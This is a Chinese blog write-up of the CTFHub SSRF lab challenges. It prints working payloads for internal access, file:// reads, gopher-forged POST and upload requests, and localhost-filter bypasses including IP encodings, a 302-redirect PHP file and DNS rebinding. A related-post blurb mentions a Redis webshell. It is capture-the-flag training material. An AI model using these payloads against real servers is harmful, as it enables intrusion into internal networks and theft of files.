【CTFhub】技能树SSRF

最新推荐文章于 2024-07-24 21:42:38 发布
最新推荐文章于 2024-07-24 21:42:38 发布
阅读量5.5k 收藏 5
点赞数 1
分类专栏: 刷题笔记 文章标签: 前端 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51614272/article/details/123315326
版权

目录

第一部分

内网访问

构造payload:

/?url=http://127.0.0.1/flag.php

伪协议读取文件

这里使用file协议,构造payload:

/?url=file:///var/www/html/flag.php

打开源码即得flag

端口扫描

据说端口范围是8000-9000哦。

直接用burpsuite无脑暴力爆破哇,立马得出端口号8293
在这里插入图片描述

所以payload:

127.0.0.1:8293

第二部分

POST请求

利用gopher协议来构造Host:127.0.0.1的POST请求。我们首先构造一个最基本的POST请求,也就是说POST请求至少要有以下内容。

POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=7b601ee4c4ecd102efebb5b5f5cb277a

注意:Content-Length的值必须和的POST请求的长度一样。

因为是伪造目标机的HTTP请求,故需对其进行URL编码,结果如下。

POST%20%2Fflag.php%20HTTP%2F1.1%0AHost%3A%20127.0.0.1%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AContent-Length%3A%2036%0A%0Akey%3D7b601ee4c4ecd102efebb5b5f5cb277a

因为在我们构造POST请求时,是以回车 /r 为换行符的,而在HTTP请求头中,是以 /r/n 为换行符的,所以我们需要将 %0A 替换为 %0D%0A,结果如下。

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D7b601ee4c4ecd102efebb5b5f5cb277a

URL编码的次数取决于请求的次数。因为payload是作为url=的参数传递的,故需对其再进行一次URL编码,结果如下。

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D7b601ee4c4ecd102efebb5b5f5cb277a

利用gopher协议构造payload如下,成功得到flag。

?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D7b601ee4c4ecd102efebb5b5f5cb277a

上传文件

SSRF,第一步上来先尝试一下127.0.0.1/flag.php
在这里插入图片描述

这题尝试利用gopher协议上传文件。

只有得到文件上传的数据包,才能编写gopher的payload。因此我们对这个文件上传的flag.php页面进行F12前端改写,添加一个submit提交按钮(这里与上一题“POST请求”相同,点击提交按钮是得不到flag的,必须从目标机本地访问)

<input type="submit" name="submit">

在这里插入图片描述

添加成功,随便上传一个非空的文件,然后抓包,成功得到文件上传的数据包。

修改Host: 127.0.0.1:80后复制,按照上一题的操作步骤,先进行一次URL编码,将 %0A 替换为 %0D%0A 后再进行一次URL编码,最后构造payload如下,成功得到flag。

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A91.0%2529%2520Gecko/20100101%2520Firefox/91.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------14020480503183837623450490631%250D%250AContent-Length%253A%2520620%250D%250AOrigin%253A%2520http%253A//challenge-8ae15e816c94c237.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-8ae15e816c94c237.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------14020480503183837623450490631%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522%25C3%25A6%25C2%2596%25C2%25B0%25C3%25A5%25C2%25BB%25C2%25BA%2520%25C3%25A6%25C2%2596%25C2%2587%25C3%25A6%25C2%259C%25C2%25AC%25C3%25A6%25C2%2596%25C2%2587%25C3%25A6%25C2%25A1%25C2%25A3.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250Aurl%253Dgopher%253A//127.0.0.1%253A80/_POST%25252520%2525252Fflag.php%25252520HTTP%2525252F1.1%2525250D%2525250AHost%2525253A%25252520127.0.0.1%2525250D%2525250AContent-Type%2525253A%25252520application%2525252Fx-www-form-urlencoded%2525250D%2525250AContent-Length%2525253A%2525252036%2525250D%2525250A%2525250D%2525250Akey%2525253D7b3de89f2a15dc8d1f5fb2698e1824a1%250D%250A-----------------------------14020480503183837623450490631%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------14020480503183837623450490631--

FastCGI协议

使用Gopherus脚本构造payload

不知道为什么一直运行不了这个脚本

Redis协议

第三部分

URL

构造payload:
@前面代表密码

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP

八进制:0177.000.000.001
十进制:127.0.0.1
十六进制:0x7f000001
都可以绕过。
构造payload

?url=0x7f000001/flag.php

302跳转

1.用localhost代替127.0.0.1

2.302跳转

用127.0.0.0/flag.php生成一个短网址 然后再构造payload:即可302跳转

?url=https://ock.cn/ork5o

3.还有个方法。就是写一个php文件:

#302.php
<?php 
header("Location:http://127.0.0.1/flag.php");

这里header头的作用就是跳转到指定网站,把他上传到公网上,然后构造payload:

?url=http://[公网IP]/302.php

DNS重绑定

配置一个自定义的恶意DNS服务器,并设定好指定域名的解析IP,再将TTL设置为0,使其解析时在非法内网IP与合法其他IP间反复横跳。我们可以自己编写解析服务,也可以利用测试dns重绑定漏洞的网站,让一个域名随意绑定两个IP。

https://lock.cmpxchg8b.com/rebinder.html

由于127段是回环地址,将AB设置成127.0.0.1和127.0.0.2,每一个都能访问localhost

构造payload

?url=
7f000001.7f000002.rbndr.us/flag.php
Sunlight_614
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUBWeb技能树——信息泄露writeup
生活·代码_这里是青_分享快乐
04-12 6755
CTFHUB writeup,web技能树之信息泄露,目录遍历、PHPINFO、备份文件下载、网站源码、bak文件、Vim缓存、.DS_Store、Git泄露、Log、Stash、Index;路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 596
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
ctfhub技能树ssrf
Naptmn的博客
02-16 495
文章目录1、内网访问 1、内网访问 内网访问要求我们从特定的服务器发送请求才能读取到信息,根据题目要求可以知道要求我们从127.0.0.1访问flag.php 打开题目之后可以看到网址上的url=_ 于是我们构造如下url即可得到flag ...
[CTFHub技能树]SSRF漏洞关卡详解!
muyuchen110的博客
07-24 872
CTFHUB技能树是一个全面、‌详细且易于理解的网络安全学习资源,‌旨在帮助学习者系统地掌握网络安全领域的各种技能。‌它涵盖了从基础到进阶的多个方面,‌包括但不限于Web安全、‌数据库安全、‌网络协议等。‌
CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描
weixin_48799157的博客
03-31 7909
小白一个,记录解题过程,如有错误请指正! 补充知识点: 1.什么是SSRF SSRF(Server-Side Request Forgery:服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务,当作跳板进行攻击) 2.SSRF产生的原因 SSRF 形成的原因往往是由于服务端提供了从其他服务器应用...
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1361
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHUB--技能树--SSRF全解(上篇)
errorr0
05-11 2246
SSRF技能树
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 400
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3942
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
通过ctfhub实操学习ssrf
不想当脚本小子的脚本小子
03-21 662
实战中碰到的SSRF漏洞比较少,刚好在freebuf上看到了一位大佬写的ssrf系统性学习文章(https://www.freebuf.com/articles/web/258365.html)就跟着一起学习一下。 SSRF,服务端请求伪造;一般情况下,SSRF攻击的目标是外网无法连接的内部系统,比如说当我们发现一个web服务器存在ssrf时,而它又连接内网,我们就可以利用这个服务器对内网发出一些请求来获取一些敏感信息,而此时的web服务器就被当作成为跳板使用; SSRF形成的原因是由于服务端提.
Ctfhub解题 web SSRF(未完待续)
weixin_46703850的博客
03-21 1189
Ctfhub解题 web SSRF(未完待续)
CTFHub技能树 Web-SSRF篇(保姆级通过全攻略)
最新发布
2301_76631050的博客
07-24 629
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
xt350488的博客
06-18 566
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
CTF相关了解
qq_44841017的博客
04-21 1594
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
CTFHub SSRF总结
iO快到碗里来
08-25 2270
内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 进入题目: 可以看到该链接可以传入一个参数url=,跟据题目描述直接构造payload:url=http://127.0.0.1/flag.php,成功得到flag。 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 进入题目: 和第一题一样,可以传入一个参数url=,首先尝试第一题的payload:url=http://127.0.0.1/flag.php 蟹bro,What’s up ??? F12看
CTFHub_技能树_WebSSRF
Ho1aAs‘s Blog
03-25 512
文章目录前言一、知识点二、题解内网访问伪协议读取文件端口扫描FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定Bypass完 前言 POST请求、上传文件两道题目未解出 一、知识点 二、题解 内网访问 伪协议读取文件 端口扫描 FastCGI协议 Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定Bypass 完 ...
CTFHub-技能树-web-RCE
yuqie的博客
06-14 227
RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
CTFHUB技能树——web
qq_63980959的博客
04-20 5762
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
ctfhub web技能树302跳转
07-28
- *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值